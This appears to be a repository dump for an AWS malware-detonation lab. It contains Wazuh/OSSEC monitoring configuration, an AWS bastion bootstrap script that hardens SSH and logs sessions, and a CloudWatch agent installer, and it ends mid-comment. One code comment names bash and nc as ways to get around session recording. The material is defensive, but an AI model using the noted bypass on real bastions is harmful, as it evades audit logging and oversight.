$insert_secret_key 151 | 152 | 153 | detonationlab-v2-s3bucketiam-14shn3d2p31tq 154 | firehose 155 | $insert_access_key 156 | $insert_secret_key 157 | 158 | 159 | detonationlab-v2-s3bucketinspector-1mfadvaua8n96 160 | firehose 161 | $insert_access_key 162 | $insert_secret_key 163 | 164 | 165 | detonationlab-v2-s3bucketmacie-wzujsedp8ht6 166 | firehose 167 | $insert_access_key 168 | $insert_secret_key 169 | 170 | 171 | detonationlab-v2-s3bucketvpcflow-35q548dsiuoe 172 | flowlogs 173 | $insert_access_key 174 | $insert_secret_key 175 | 176 | 177 | 178 | 179 | 180 | no 181 | 182 | 183 | 43200 184 
| 185 | yes 186 | 187 | 188 | yes 189 | 190 | 191 | no 192 | 193 | 194 | /etc,/usr/bin,/usr/sbin 195 | /bin,/sbin,/boot 196 | 197 | 198 | /etc/mtab 199 | /etc/hosts.deny 200 | /etc/mail/statistics 201 | /etc/random-seed 202 | /etc/random.seed 203 | /etc/adjtime 204 | /etc/httpd/logs 205 | /etc/utmpx 206 | /etc/wtmpx 207 | /etc/cups/certs 208 | /etc/dumpdates 209 | /etc/svc/volatile 210 | /sys/kernel/security 211 | /sys/kernel/debug 212 | 213 | 214 | /etc/ssl/private.key 215 | 216 | yes 217 | 218 | 219 | yes 220 | 221 | 222 | yes 223 | 224 | 225 | 226 | 227 | 127.0.0.1 228 | ^localhost.localdomain$ 229 | 172.16.0.2 230 | 231 | 232 | 233 | disable-account 234 | disable-account.sh 235 | user 236 | yes 237 | 238 | 239 | 240 | restart-ossec 241 | restart-ossec.sh 242 | 243 | 244 | 245 | 246 | firewall-drop 247 | firewall-drop.sh 248 | srcip 249 | yes 250 | 251 | 252 | 253 | host-deny 254 | host-deny.sh 255 | srcip 256 | yes 257 | 258 | 259 | 260 | route-null 261 | route-null.sh 262 | srcip 263 | yes 264 | 265 | 266 | 267 | win_route-null 268 | route-null.cmd 269 | srcip 270 | yes 271 | 272 | 273 | 278 | 279 | 280 | 281 | command 282 | df -P 283 | 360 284 | 285 | 286 | 287 | full_command 288 | netstat -tulpn | sed 's/\([[:alnum:]]\+\)\ \+[[:digit:]]\+\ \+[[:digit:]]\+\ \+\(.*\):\([[:digit:]]*\)\ \+\([0-9\.\:\*]\+\).\+\ \([[:digit:]]*\/[[:alnum:]\-]*\).*/\1 \2 == \3 == \4 \5/' | sort -k 4 -g | sed 's/ == \(.*\) ==/:\1/' | sed 1,2d 289 | netstat listening ports 290 | 360 291 | 292 | 293 | 294 | full_command 295 | last -n 20 296 | 360 297 | 298 | 299 | 300 | 301 | ruleset/decoders 302 | ruleset/rules 303 | 0215-policy_rules.xml 304 | etc/lists/audit-keys 305 | etc/lists/amazon/aws-sources 306 | etc/lists/amazon/aws-eventnames 307 | 308 | 309 | etc/decoders 310 | etc/rules 311 | 312 | 313 | 317 | 318 | no 319 | 1515 320 | yes 321 | yes 322 | 0 323 | yes 324 | no 325 | yes 326 | HIGH:!ADH:!EXP:!MD5:!RC4:!3DES:!CAMELLIA:@STRENGTH 327 | 328 | no 329 | 
/var/ossec/etc/sslmanager.cert 330 | /var/ossec/etc/sslmanager.key 331 | no 332 | 333 | 334 | 335 | wazuh 336 | node01 337 | master 338 | 339 | 1516 340 | 0.0.0.0 341 | 342 | NODE_IP 343 | 344 | no 345 | yes 346 | 347 | 348 | 349 | 350 | 351 | 352 | audit 353 | /var/log/audit/audit.log 354 | 355 | 356 | 357 | syslog 358 | /var/ossec/logs/active-responses.log 359 | 360 | 361 | 362 | syslog 363 | /var/log/messages 364 | 365 | 366 | 367 | syslog 368 | /var/log/secure 369 | 370 | 371 | 372 | syslog 373 | /var/log/maillog 374 | 375 | 376 | 377 | EOF 378 | 379 |
--------------------------------------------------------------------------------
/additionalInstallationScripts/bastion_bootstrap.sh:
--------------------------------------------------------------------------------
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.

#!/bin/bash -e
# Bastion Bootstrapping
# authors: tonynv@amazon.com, sancard@amazon.com, ianhill@amazon.com
# NOTE: This requires GNU getopt. On Mac OS X and FreeBSD you must install GNU getopt and mod the checkos function so that it's supported


# Configuration
PROGRAM='Linux Bastion'

##################################### Functions Definitions
function checkos () {
    platform='unknown'
    unamestr=`uname`
    if [[ "$unamestr" == 'Linux' ]]; then
        platform='linux'
    else
        echo "[WARNING] This script is not supported on MacOS or freebsd"
        exit 1
    fi
    echo "${FUNCNAME[0]} Ended"
}

function usage () {
    echo "$0 "
    echo " "
    echo "options:"
    echo -e "--help \t Show options for this script"
    echo -e "--banner \t Enable or Disable Bastion Message"
    echo -e "--enable \t SSH Banner"
    echo -e "--tcp-forwarding \t Enable or Disable TCP Forwarding"
    echo -e "--x11-forwarding \t Enable or Disable X11 Forwarding"
}

function chkstatus () {
    if [ $? -eq 0 ]
    then
        echo "Script [PASS]"
    else
        echo "Script [FAILED]" >&2
        exit 1
    fi
}

function osrelease () {
    OS=`cat /etc/os-release | grep '^NAME=' | tr -d \" | sed 's/\n//g' | sed 's/NAME=//g'`
    if [[ "$OS" == "Ubuntu" ]]; then
        echo "Ubuntu"
    elif [[ "$OS" == *"Amazon Linux"* ]]; then
        echo "AMZN"
    elif [[ "$OS" == "CentOS Linux" ]]; then
        echo "CentOS"
    else
        echo "Operating System Not Found"
    fi
    echo "${FUNCNAME[0]} Ended" >> /var/log/cfn-init.log
}

function harden_ssh_security () {
    # Allow ec2-user only to access this folder and its content
    #chmod -R 770 /var/log/bastion
    #setfacl -Rdm other:0 /var/log/bastion

    # Make OpenSSH execute a custom script on logins
    echo -e "\nForceCommand /usr/bin/bastion/shell" >> /etc/ssh/sshd_config
    # LOGGING CONFIGURATION
    mkdir -p /var/log/bastion
    mkdir -p /usr/bin/bastion


    touch /tmp/messages
    chmod 770 /tmp/messages
    log_file_location="${bastion_mnt}/${bastion_log}"
    log_shadow_file_location="${bastion_mnt}/.${bastion_log}"


    cat <<'EOF' >> /usr/bin/bastion/shell
bastion_mnt="/var/log/bastion"
bastion_log="bastion.log"
# Check that the SSH client did not supply a command. Only SSH to instance should be allowed.
export Allow_SSH="ssh"
if [[ -z $SSH_ORIGINAL_COMMAND ]] || [[ $SSH_ORIGINAL_COMMAND =~ ^$Allow_SSH ]]; then
#Allow ssh to instance and log connection

    log_file=`echo "$log_shadow_file_location"`
    DATE_TIME_WHOAMI="`whoami`:`date "+%Y-%m-%d %H:%M:%S"`"
    LOG_ORIGINAL_COMMAND=`echo "$DATE_TIME_WHOAMI:$SSH_ORIGINAL_COMMAND"`
    echo "$LOG_ORIGINAL_COMMAND" >> "${bastion_mnt}/${bastion_log}"
    log_dir="/var/log/bastion/"
    script -qf /tmp/messages --command=/bin/bash
else
    # The "script" program could be circumvented with some commands
    # (e.g. bash, nc). Therefore, I intentionally prevent users
    # from supplying commands.

    echo "This bastion supports interactive sessions only. Do not supply a command"
    exit 1
fi
EOF

    # Make the custom script executable
    chmod a+x /usr/bin/bastion/shell

    release=$(osrelease)
    if [ "$release" == "CentOS" ]; then
        semanage fcontext -a -t ssh_exec_t /usr/bin/bastion/shell
    fi

    echo "${FUNCNAME[0]} Ended"
}

function amazon_os () {
    echo "${FUNCNAME[0]} Started"
    chown root:ec2-user /usr/bin/script
    service sshd restart
    echo -e "\nDefaults env_keep += \"SSH_CLIENT\"" >>/etc/sudoers
    cat <<'EOF' >> /etc/bashrc
#Added by linux bastion bootstrap
declare -rx IP=$(echo $SSH_CLIENT | awk '{print $1}')
EOF

    echo " declare -rx BASTION_LOG=${BASTION_MNT}/${BASTION_LOG}" >> /etc/bashrc

    cat <<'EOF' >> /etc/bashrc
declare -rx PROMPT_COMMAND='history -a >(logger -t "ON: $(date) [FROM]:${IP} [USER]:${USER} [PWD]:${PWD}" -s 2>>${BASTION_LOG})'
EOF
    chown root:ec2-user ${BASTION_MNT}
    chown root:ec2-user ${BASTION_LOGFILE}
    chown root:ec2-user ${BASTION_LOGFILE_SHADOW}
    chmod 662 ${BASTION_LOGFILE}
    chmod 662 ${BASTION_LOGFILE_SHADOW}
    chattr +a ${BASTION_LOGFILE}
    chattr +a ${BASTION_LOGFILE_SHADOW}
    touch /tmp/messages
    chown root:ec2-user /tmp/messages
    #Install CloudWatch Log service on AMZN
    yum update -y
    yum install -y awslogs
    export CWG=`curl http://169.254.169.254/latest/user-data/ | grep CLOUDWATCHGROUP | sed 's/CLOUDWATCHGROUP=//g'`
    echo "file = $BASTION_LOGFILE_SHADOW" >> /tmp/groupname.txt
    echo "log_group_name = $CWG" >> /tmp/groupname.txt

    cat <<'EOF' >> ~/cloudwatchlog.conf

[/var/log/bastion]
datetime_format = %b %d %H:%M:%S
buffer_duration = 5000
log_stream_name = {instance_id}
initial_position = start_of_file
EOF

    LINE=$(cat -n /etc/awslogs/awslogs.conf | grep '\[\/var\/log\/messages\]' | awk {'print $1'})
    END_LINE=$(echo $(($LINE-1)))
    head -$END_LINE /etc/awslogs/awslogs.conf > /tmp/awslogs.conf
    cat /tmp/awslogs.conf > /etc/awslogs/awslogs.conf
    cat ~/cloudwatchlog.conf >> /etc/awslogs/awslogs.conf
    cat /tmp/groupname.txt >> /etc/awslogs/awslogs.conf
    export TMPREGION=`cat /etc/awslogs/awscli.conf | grep region`
    export Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev`
    sed -i.back "s/$TMPREGION/region = $Region/g" /etc/awslogs/awscli.conf

    #Restart awslogs service
    service awslogs restart
    chkconfig awslogs on

    #Run security updates
    cat <<'EOF' >> ~/mycron
0 0 * * * yum -y update --security
EOF
    crontab ~/mycron
    rm ~/mycron
    echo "${FUNCNAME[0]} Ended"
}

function ubuntu_os () {
    chown syslog:adm /var/log/bastion
    chown root:ubuntu /usr/bin/script
    cat <<'EOF' >> /etc/bash.bashrc
#Added by linux bastion bootstrap
declare -rx IP=$(who am i --ips|awk '{print $5}')
EOF

    echo " declare -rx BASTION_LOG=${BASTION_MNT}/${BASTION_LOG}" >> /etc/bash.bashrc

    cat <<'EOF' >> /etc/bash.bashrc
declare -rx PROMPT_COMMAND='history -a >(logger -t "ON: $(date) [FROM]:${IP} [USER]:${USER} [PWD]:${PWD}" -s 2>>${BASTION_LOG})'
EOF
    chown root:ubuntu ${BASTION_MNT}
    chown root:ubuntu ${BASTION_LOGFILE}
    chown root:ubuntu ${BASTION_LOGFILE_SHADOW}
    chmod 662 ${BASTION_LOGFILE}
    chmod 662 ${BASTION_LOGFILE_SHADOW}
    chattr +a ${BASTION_LOGFILE}
    chattr +a ${BASTION_LOGFILE_SHADOW}
    touch /tmp/messages
    chown root:ubuntu /tmp/messages
    #Install CloudWatch logs on Ubuntu
    export CWG=`curl http://169.254.169.254/latest/user-data/ | grep CLOUDWATCHGROUP | sed 's/CLOUDWATCHGROUP=//g'`
    echo "file = $BASTION_LOGFILE_SHADOW" >> /tmp/groupname.txt
    echo "log_group_name = $CWG" >> /tmp/groupname.txt

    cat <<'EOF' >> ~/cloudwatchlog.conf
[general]
state_file = /var/awslogs/state/agent-state

[/var/log/bastion]
log_stream_name = {instance_id}
datetime_format = %b %d %H:%M:%S
EOF
    export Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev`
    cat /tmp/groupname.txt >> ~/cloudwatchlog.conf

    curl https://s3.amazonaws.com/aws-cloudwatch/downloads/latest/awslogs-agent-setup.py -O
    export DEBIAN_FRONTEND=noninteractive
    apt-get install -y python
    chmod +x ./awslogs-agent-setup.py
    ./awslogs-agent-setup.py -n -r $Region -c ~/cloudwatchlog.conf

    #Install Unit file for Ubuntu 16.04
    ubuntu=`cat /etc/os-release | grep VERSION_ID | tr -d \VERSION_ID=\"`
    if [ "$ubuntu" == "16.04" ]; then
        cat <<'EOF' >> /etc/systemd/system/awslogs.service
[Unit]
Description=The CloudWatch Logs agent
After=rc-local.service

[Service]
Type=simple
Restart=always
KillMode=process
TimeoutSec=infinity
PIDFile=/var/awslogs/state/awslogs.pid
ExecStart=/var/awslogs/bin/awslogs-agent-launcher.sh --start --background --pidfile $PIDFILE --user awslogs --chuid awslogs &

[Install]
WantedBy=multi-user.target
EOF
    fi

    #Restart awslogs service
    service awslogs restart
    export DEBIAN_FRONTEND=noninteractive
    apt-get install sysv-rc-conf -y
    sysv-rc-conf awslogs on

    #Restart SSH
    service ssh stop
    service ssh start

    #Run security updates (-y so the install cannot block on a prompt during bootstrap)
    apt-get install -y unattended-upgrades
    cat <<'EOF' >> ~/mycron
0 0 * * * unattended-upgrades -d
EOF
    crontab ~/mycron
    rm ~/mycron
    echo "${FUNCNAME[0]} Ended"
}

function cent_os () {
    echo -e "\nDefaults env_keep += \"SSH_CLIENT\"" >>/etc/sudoers
    cat <<'EOF' >> /etc/bashrc
#Added by linux bastion bootstrap
declare -rx IP=$(echo $SSH_CLIENT | awk '{print $1}')
EOF

    echo "declare -rx BASTION_LOG=${BASTION_MNT}/${BASTION_LOG}" >> /etc/bashrc

    cat <<'EOF' >> /etc/bashrc
declare -rx PROMPT_COMMAND='history -a >(logger -t "ON: $(date) [FROM]:${IP} [USER]:${USER} [PWD]:${PWD}" -s 2>>${BASTION_LOG})'
EOF
    chown root:centos ${BASTION_MNT}
    chown root:centos /usr/bin/script
    chown root:centos /var/log/bastion/bastion.log
    chmod 770 /var/log/bastion/bastion.log
    touch /tmp/messages
    chown root:centos /tmp/messages
    restorecon -v /etc/ssh/sshd_config
    /bin/systemctl restart sshd.service



    # Install CloudWatch Log service on Centos Linux
    export CWG=`curl http://169.254.169.254/latest/user-data/ | grep CLOUDWATCHGROUP | sed 's/CLOUDWATCHGROUP=//g'`
    centos=`cat /etc/os-release | grep VERSION_ID | tr -d \VERSION_ID=\"`
    if [ "$centos" == "7" ]; then
        echo "file = $BASTION_LOGFILE_SHADOW" >> /tmp/groupname.txt
        echo "log_group_name = $CWG" >> /tmp/groupname.txt

        cat <<'EOF' >> ~/cloudwatchlog.conf
[general]
state_file = /var/awslogs/state/agent-state
use_gzip_http_content_encoding = true
logging_config_file = /var/awslogs/etc/awslogs.conf

[/var/log/bastion]
datetime_format = %Y-%m-%d %H:%M:%S
file = /var/log/messages
buffer_duration = 5000
log_stream_name = {instance_id}
initial_position = start_of_file
EOF
        export Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev`
        cat /tmp/groupname.txt >> ~/cloudwatchlog.conf

        curl https://s3.amazonaws.com/aws-cloudwatch/downloads/latest/awslogs-agent-setup.py -O
        chmod +x ./awslogs-agent-setup.py
        ./awslogs-agent-setup.py -n -r $Region -c ~/cloudwatchlog.conf
        cat <<'EOF' >> /etc/systemd/system/awslogs.service
[Unit]
Description=The CloudWatch Logs agent
After=rc-local.service

[Service]
Type=simple
Restart=always
KillMode=process
TimeoutSec=infinity
PIDFile=/var/awslogs/state/awslogs.pid
ExecStart=/var/awslogs/bin/awslogs-agent-launcher.sh --start --background --pidfile $PIDFILE --user awslogs --chuid awslogs &

[Install]
WantedBy=multi-user.target
EOF
        service awslogs restart
        chkconfig awslogs on
    else
        chown root:centos /var/log/bastion
        yum update -y
        yum install -y awslogs
        export Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev`
        export TMPREGION=`cat /etc/awslogs/awscli.conf | grep region`
        sed -i.back "s/$TMPREGION/region = $Region/g" /etc/awslogs/awscli.conf
        export CWG=`curl http://169.254.169.254/latest/user-data/ | grep CLOUDWATCHGROUP | sed 's/CLOUDWATCHGROUP=//g'`
        echo "file = $BASTION_LOGFILE_SHADOW" >> /tmp/groupname.txt
        echo "log_group_name = $CWG" >> /tmp/groupname.txt

        cat <<'EOF' >> ~/cloudwatchlog.conf

[/var/log/bastion]
datetime_format = %b %d %H:%M:%S
buffer_duration = 5000
log_stream_name = {instance_id}
initial_position = start_of_file
EOF
        export TMPGROUP=`cat /etc/awslogs/awslogs.conf | grep ^log_group_name`
        export TMPGROUP=`echo $TMPGROUP | sed 's/\//\\\\\//g'`
        sed -i.back "s/$TMPGROUP/log_group_name = $CWG/g" /etc/awslogs/awslogs.conf
        cat ~/cloudwatchlog.conf >> /etc/awslogs/awslogs.conf
        cat /tmp/groupname.txt >> /etc/awslogs/awslogs.conf
        yum install ec2-metadata -y
        export TMPREGION=`cat /etc/awslogs/awscli.conf | grep region`
        export Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev`
        sed -i.back "s/$TMPREGION/region = $Region/g" /etc/awslogs/awscli.conf
        sleep 3
        service awslogs stop
        sleep 3
        service awslogs start
        chkconfig awslogs on
    fi

    #Run security updates
    cat <<'EOF' >> ~/mycron
0 0 * * * yum -y update --security
EOF
    crontab ~/mycron
    rm ~/mycron
    echo "${FUNCNAME[0]} Ended"
}

function request_eip() {
    release=$(osrelease)
    export Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev`

    #Check if EIP already assigned.
    ALLOC=1
    ZERO=0
    INSTANCE_IP=`ifconfig -a | grep inet | awk {'print $2'} | sed 's/addr://g' | head -1`
    ASSIGNED=$(aws ec2 describe-addresses --region $Region --output text | grep $INSTANCE_IP | wc -l)
    if [ "$ASSIGNED" -gt "$ZERO" ]; then
        echo "Already assigned an EIP."
    else
        aws ec2 describe-addresses --region $Region --output text > /query.txt
        #Ensure we are only using EIPs from our Stack
        line=`curl http://169.254.169.254/latest/user-data/ | grep EIP_LIST`
        IFS=$':' DIRS=(${line//$','/:}) # Replace commas with colons and split on them.

        for (( i=0 ; i<${#DIRS[@]} ; i++ )); do
            EIP=`echo ${DIRS[i]} | sed 's/\"//g' | sed 's/EIP_LIST=//g'`
            if [ "$EIP" != "Null" ]; then
                #echo "$i: $EIP"
                grep "$EIP" /query.txt >> /query2.txt;
            fi
        done
        mv /query2.txt /query.txt


        AVAILABLE_EIPs=`cat /query.txt | wc -l`

        if [ "$AVAILABLE_EIPs" -gt "$ZERO" ]; then
            FIELD_COUNT="5"
            INSTANCE_ID=$(curl -s http://169.254.169.254/latest/meta-data/instance-id)
            echo "Running associate_eip_now"
            while read name;
            do
                #EIP_ENTRY=$(echo $name | grep eip | wc -l)
                EIP_ENTRY=$(echo $name | grep eni | wc -l)
                echo "EIP: $EIP_ENTRY"
                if [ "$EIP_ENTRY" -eq 1 ]; then
                    echo "Already associated with an instance"
                    echo ""
                else
                    export EIP=`echo "$name" | sed 's/[\s]+/,/g' | awk {'print $4'}`
                    EIPALLOC=`echo $name | awk {'print $2'}`
                    echo "NAME: $name"
                    echo "EIP: $EIP"
                    echo "EIPALLOC: $EIPALLOC"
                    aws ec2 associate-address --instance-id $INSTANCE_ID --allocation-id $EIPALLOC --region $Region
                fi
            done < /query.txt
        else
            echo "[ERROR] No Elastic IPs available in this region"
            exit 1
        fi

        INSTANCE_IP=`ifconfig -a | grep inet | awk {'print $2'} | sed 's/addr://g' | head -1`
        ASSIGNED=$(aws ec2 describe-addresses --region $Region --output text | grep $INSTANCE_IP | wc -l)
        if [ "$ASSIGNED" -eq 1 ]; then
            echo "EIP successfully assigned."
        else
            #Retry
            while [ "$ASSIGNED" -eq "$ZERO" ]
            do
                sleep 3
                request_eip
                INSTANCE_IP=`ifconfig -a | grep inet | awk {'print $2'} | sed 's/addr://g' | head -1`
                ASSIGNED=$(aws ec2 describe-addresses --region $Region --output text | grep $INSTANCE_IP | wc -l)
            done
        fi
    fi

    echo "${FUNCNAME[0]} Ended"
}

function call_request_eip() {
    Region=`curl http://169.254.169.254/latest/meta-data/placement/availability-zone | rev | cut -c 2- | rev`
    ZERO=0
    INSTANCE_IP=`ifconfig -a | grep inet | awk {'print $2'} | sed 's/addr://g' | head -1`
    ASSIGNED=$(aws ec2 describe-addresses --region $Region --output text | grep $INSTANCE_IP | wc -l)
    if [ "$ASSIGNED" -gt "$ZERO" ]; then
        echo "Already assigned an EIP."
    else
        WAIT=$(shuf -i 1-30 -n 1)
        sleep "$WAIT"
        request_eip
    fi
    echo "${FUNCNAME[0]} Ended"
}

function prevent_process_snooping() {
    # Prevent bastion host users from viewing processes owned by other users.

    mount -o remount,rw,hidepid=2 /proc
    awk '!/proc/' /etc/fstab > temp && mv temp /etc/fstab
    echo "proc /proc proc defaults,hidepid=2 0 0" >> /etc/fstab
    echo "${FUNCNAME[0]} Ended"
}

##################################### End Function Definitions

# Call checkos to ensure platform is Linux
checkos

## set an initial value
SSH_BANNER="LINUX BASTION"

# Read the options from cli input
TEMP=`getopt -o h: --long help,banner:,enable:,tcp-forwarding:,x11-forwarding: -n $0 -- "$@"`
eval set -- "$TEMP"


if [ $# == 1 ] ; then echo "No input provided! type ($0 --help) to see usage help" >&2 ; exit 1 ; fi

# extract options and their arguments into variables.
while true; do
    case "$1" in
        -h | --help)
            usage
            exit 1
            ;;
        --banner)
            BANNER_PATH="$2";
            shift 2
            ;;
        --enable)
            ENABLE="$2";
            shift 2
            ;;
        --tcp-forwarding)
            TCP_FORWARDING="$2";
            shift 2
            ;;
        --x11-forwarding)
            X11_FORWARDING="$2";
            shift 2
            ;;
        --)
            break
            ;;
        *)
            break
            ;;
    esac
done

# BANNER CONFIGURATION
BANNER_FILE="/etc/ssh_banner"
if [[ $ENABLE == "true" ]];then
    if [ -z ${BANNER_PATH} ];then
        echo "BANNER_PATH is null skipping ..."
    else
        echo "BANNER_PATH = ${BANNER_PATH}"
        echo "Creating Banner in ${BANNER_FILE}"
        echo "curl -s ${BANNER_PATH} > ${BANNER_FILE}"
        curl -s ${BANNER_PATH} > ${BANNER_FILE}
        # Only install the banner if the download actually produced a non-empty file
        if [ -s "$BANNER_FILE" ] ;then
            echo "[INFO] Installing banner ... "
            echo -e "\n Banner ${BANNER_FILE}" >>/etc/ssh/sshd_config
        else
            echo "[INFO] banner file is not accessible skipping ..."
            exit 1;
        fi
    fi
else
    echo "Banner message is not enabled!"
fi

# LOGGING CONFIGURATION
declare -rx BASTION_MNT="/var/log/bastion"
declare -rx BASTION_LOG="bastion.log"
echo "Setting up bastion session log in ${BASTION_MNT}/${BASTION_LOG}"
mkdir -p ${BASTION_MNT}
declare -rx BASTION_LOGFILE="${BASTION_MNT}/${BASTION_LOG}"
declare -rx BASTION_LOGFILE_SHADOW="${BASTION_MNT}/.${BASTION_LOG}"
touch ${BASTION_LOGFILE}
ln ${BASTION_LOGFILE} ${BASTION_LOGFILE_SHADOW}


#Enable/Disable TCP forwarding
TCP_FORWARDING=`echo "$TCP_FORWARDING" | sed 's/\\n//g'`

#Enable/Disable X11 forwarding
X11_FORWARDING=`echo "$X11_FORWARDING" | sed 's/\\n//g'`

echo "Value of TCP_FORWARDING - $TCP_FORWARDING"

echo "Value of X11_FORWARDING - $X11_FORWARDING"

if [[ $TCP_FORWARDING == "false" ]];then
    awk '!/AllowTcpForwarding/' /etc/ssh/sshd_config > temp && mv temp /etc/ssh/sshd_config
    echo "AllowTcpForwarding no" >> /etc/ssh/sshd_config
    harden_ssh_security
fi

if [[ $X11_FORWARDING == "false" ]];then
    awk '!/X11Forwarding/' /etc/ssh/sshd_config > temp && mv temp /etc/ssh/sshd_config
    echo "X11Forwarding no" >> /etc/ssh/sshd_config
fi

release=$(osrelease)
# Ubuntu Linux
if [ "$release" == "Ubuntu" ]; then
    #Call function for Ubuntu
    ubuntu_os
# AMZN Linux
elif [ "$release" == "AMZN" ]; then
    #Call function for AMZN
    amazon_os
# CentOS Linux
elif [ "$release" == "CentOS" ]; then
    #Call function for CentOS
    cent_os
else
    echo "[ERROR] Unsupported Linux Bastion OS"
    exit 1
fi

prevent_process_snooping

call_request_eip

echo "Bootstrap complete."
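The ForceCommand wrapper that harden_ssh_security writes to /usr/bin/bastion/shell decides, from $SSH_ORIGINAL_COMMAND, whether a session may proceed and then appends a user:timestamp:command line to the bastion log. As an added example (not part of the Quick Start bastion_bootstrap.sh above and not the lab's own code), the same decision and audit-line layout factored into POSIX shell functions that can be exercised without an SSH daemon; the function names and the sample requests are constructed for this illustration:

```shell
# Added example, not part of bastion_bootstrap.sh: the ForceCommand wrapper's
# allow/deny decision and audit line as testable functions. Function names and
# the sample requests below are constructed.

# Allow an interactive session (empty command) or a plain "ssh ..." hop and deny
# anything else. The wrapper in the bootstrap script matches the prefix "ssh",
# which also accepts a command whose first word merely starts with those letters
# (for example "sshfs"); here "ssh" must be the whole first word.
bastion_allow_command() {
    case "$1" in
        "")         return 0 ;;
        ssh|"ssh "*) return 0 ;;
        *)          return 1 ;;
    esac
}

# Audit line in the wrapper's layout, user:timestamp:command. The timestamp is
# passed in so the output is reproducible.
bastion_audit_line() {
    printf '%s:%s:%s\n' "$1" "$2" "$3"
}

# Count how many of the given requests would be allowed.
bastion_count_allowed() {
    n=0
    for req in "$@"; do
        if bastion_allow_command "$req"; then n=$((n + 1)); fi
    done
    echo "$n"
}

# Walk a constructed batch of requests and print the decision for each one.
bastion_demo() {
    for req in "" "ssh 10.0.0.5" "ssh -l ec2-user app01" "bash -c id" "sshfs app01:/srv /mnt" "scp notes.txt app01:"; do
        if bastion_allow_command "$req"; then
            printf 'ALLOW %s\n' "$(bastion_audit_line ec2-user "$(date '+%Y-%m-%d %H:%M:%S')" "$req")"
        else
            printf 'DENY  %s\n' "$req"
        fi
    done
}

bastion_demo
```

Note that in the wrapper above the allowed branch always starts an interactive bash under script and never runs the requested command, so the allow-list only governs whether a logged session is opened; the denied branch is what keeps a client-supplied command from bypassing the session recording.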

--------------------------------------------------------------------------------
/additionalInstallationScripts/cloudwatchAgentLogs.ps1:
--------------------------------------------------------------------------------
#Download the CloudWatch agent
$url = "https://s3.amazonaws.com/amazoncloudwatch-agent/windows/amd64/latest/AmazonCloudWatchAgent.zip"
$output = "C:\Users\Administrator\Desktop\AmazonCloudWatchAgent.zip"
Invoke-WebRequest -Uri $url -OutFile $output

#unzip CloudWatch agent
Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip
{
    param([string]$zipfile, [string]$outpath)

    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}

Unzip "C:\Users\Administrator\Desktop\AmazonCloudWatchAgent.zip" "C:\Users\Administrator\Desktop\AmazonCloudWatchAgent"

#change to directory
Set-Location -Path "C:\Users\Administrator\Desktop\AmazonCloudWatchAgent"

#Install the package
#On a server running Windows Server, open PowerShell, change to the directory containing the unzipped package, and use the install.ps1 script to install it.
.\install.ps1

#Write the Common Configuration for the CloudWatch Agent (Windows event logs plus TCP connection metrics)
#to C:\Users\Administrator\Documents\cloudwatchconfig.json
$config = '{
    "logs": {
        "logs_collected": {
            "windows_events": {
                "collect_list": [{
                        "event_format": "xml",
                        "event_levels": [
                            "VERBOSE",
                            "INFORMATION",
                            "WARNING",
                            "ERROR",
                            "CRITICAL"
                        ],
                        "event_name": "System",
                        "log_group_name": "detonationLab-windows"
                    },
                    {
                        "event_format": "xml",
                        "event_levels": [
                            "VERBOSE",
                            "INFORMATION",
                            "WARNING",
                            "ERROR",
                            "CRITICAL"
                        ],
                        "event_name": "Security",
                        "log_group_name": "detonationLab-windows"
                    },
                    {
                        "event_format": "xml",
                        "event_levels": [
                            "VERBOSE",
                            "INFORMATION",
                            "WARNING",
                            "ERROR",
                            "CRITICAL"
                        ],
                        "event_name": "Application",
                        "log_group_name": "detonationLab-windows"
                    }
                ]
            }
        }
    },
    "metrics": {
        "append_dimensions": {
            "AutoScalingGroupName": "${aws:AutoScalingGroupName}",
            "ImageId": "${aws:ImageId}",
            "InstanceId": "${aws:InstanceId}",
            "InstanceType": "${aws:InstanceType}"
        },
        "metrics_collected": {
            "TCPv4": {
                "measurement": [
                    "Connections Established"
                ],
                "metrics_collection_interval": 60
            },
            "TCPv6": {
                "measurement": [
                    "Connections Established"
                ],
                "metrics_collection_interval": 60
            }
        }
    }
}'
#$config already holds the JSON text, so it is written out as-is: piping it through
#ConvertTo-Json would wrap the whole document in a JSON string literal. Out-File in
#Windows PowerShell defaults to UTF-16, which the agent does not read, hence the explicit encoding.
$config | Set-Content -Path "C:\Users\Administrator\Documents\cloudwatchconfig.json" -Encoding ascii

#On a server running Windows Server, type the following if you saved the configuration file on the local computer
& "C:\Program Files\Amazon\AmazonCloudWatchAgent\amazon-cloudwatch-agent-ctl.ps1" -a fetch-config -m ec2 -c file:"C:\Users\Administrator\Documents\cloudwatchconfig.json" -s
--------------------------------------------------------------------------------
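Both CloudWatch agent scripts in this directory, cloudwatchAgentLogs.ps1 above and cloudwatchAgentLogs.sh below, write the agent configuration by hand; the Linux one documents in its awslogs.conf comments that each monitored file gets its own section and that datetime_format tells the agent how to read the timestamp (for example %b %d %H:%M:%S for syslog). As an added example (not the project's code), a small POSIX shell helper that emits such a section and checks constructed sample lines against the chosen format before the configuration is installed; the function names, the log group name example-log-group and the sample lines are all assumptions made here:

```shell
# Added example, not part of the lab's scripts: build an awslogs.conf section and
# check sample lines against the datetime_format it declares. Function names,
# the log group "example-log-group" and the sample lines are constructed.

# Emit one file section for the CloudWatch Logs agent (awslogs) configuration.
# Arguments: path of the log file, destination log group, datetime_format.
awslogs_section() {
    printf '[%s]\n' "$1"
    printf 'file = %s\n' "$1"
    printf 'log_group_name = %s\n' "$2"
    printf 'log_stream_name = {instance_id}\n'
    printf 'datetime_format = %s\n' "$3"
    printf 'buffer_duration = 5000\n'
    printf 'initial_position = start_of_file\n'
}

# Translate the three datetime_format examples from the agent's own comment block
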